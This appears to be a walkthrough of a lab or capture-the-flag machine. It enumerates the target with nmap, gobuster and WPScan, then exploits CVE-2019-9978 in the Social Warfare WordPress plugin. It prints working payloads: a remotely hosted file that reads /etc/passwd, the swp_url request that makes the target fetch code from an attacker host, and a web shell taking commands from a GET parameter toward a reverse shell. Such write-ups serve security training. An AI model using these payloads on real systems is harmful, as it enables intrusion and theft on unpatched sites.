┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.161.123 -p 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp filtered http
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.161.123 -w /usr/share/wordlists/dirb/common.txt -q -t 300
/index.html (Status: 200) [Size: 23]
/robots.txt (Status: 200) [Size: 57]
/server-status (Status: 403) [Size: 280]
/wordpress (Status: 301) [Size: 322] [--> <http://192.168.161.123/wordpress/>]
/robots.txt turns out to be a troll with nothing useful in it. Since gobuster found a /wordpress directory, the next step is a WPScan against it:
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url 192.168.161.123/wordpress/
[+] URL: <http://192.168.161.123/wordpress/> [192.168.161.123]
[+] Started: Mon Jun 27 10:56:12 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://192.168.161.123/wordpress/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://192.168.161.123/wordpress/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://192.168.161.123/wordpress/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://192.168.161.123/wordpress/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Rss Generator (Passive Detection)
| - <http://192.168.161.123/wordpress/index.php/feed/>, <generator><https://wordpress.org/?v=5.5></generator>
| - <http://192.168.161.123/wordpress/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.5></generator>
[+] WordPress theme in use: twentytwenty
| Location: <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/readme.txt>
| [!] The version is out of date, the latest version is 2.0
| Style URL: <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5>
| Style Name: Twenty Twenty
| Style URI: <https://wordpress.org/themes/twentytwenty/>
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5>, Match: 'Version: 1.5'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] social-warfare
| Location: <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/>
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.2 (100% confidence)
| Found By: Comment (Passive Detection)
| - <http://192.168.161.123/wordpress/>, Match: 'Social Warfare v3.5.2'
| Confirmed By:
| Query Parameter (Passive Detection)
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2>
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2>
| Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/readme.txt>
| Readme - ChangeLog Section (Aggressive Detection)
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/readme.txt>
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:01:25 <=========================================> (137 / 137) 100.00% Time: 00:01:25
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Mon Jun 27 10:59:18 2022
[+] Requests Done: 188
[+] Cached Requests: 5
[+] Data Sent: 48.881 KB
[+] Data Received: 18.767 MB
[+] Memory used: 237.949 MB
[+] Elapsed time: 00:03:05
Note that WPScan identifies the social-warfare plugin at version 3.5.2 (100% confidence), which is out of date. Looking that version up in the WPScan vulnerability database gives an unauthenticated remote code execution issue (CVE-2019-9978), along with a PoC:
https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
1. Create a payload file and host it on a location accessible by the targeted website. Payload content: "<pre>system('cat /etc/passwd')</pre>"
2. Visit <http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt>
3. Content of /etc/passwd will be returned
First craft a payload.txt with the following content (the plugin only evaluates what sits between the <pre> and </pre> tags, so they are required):
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ cat payload.txt
<pre>system('cat /etc/passwd')</pre>
Then host it with a web server. Keep it on port 80 so the swp_url below is a plain http://ATTACKER/payload.txt with no port component:
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ sudo python3 -m http.server 80
Then request the following URL (the plugin fetches swp_url, extracts the PHP between the <pre> tags and evaluates it), and the response contains /etc/passwd:
<http://TARGET/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER/payload.txt>
That confirms the target is vulnerable to this PoC. Since the payload is evaluated as PHP on the server, we can take the command from a GET parameter instead of hard-coding it, run arbitrary commands through that, and then use it to spawn a reverse shell:
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ cat shell.txt
<pre>system($_GET['cmd'])</pre>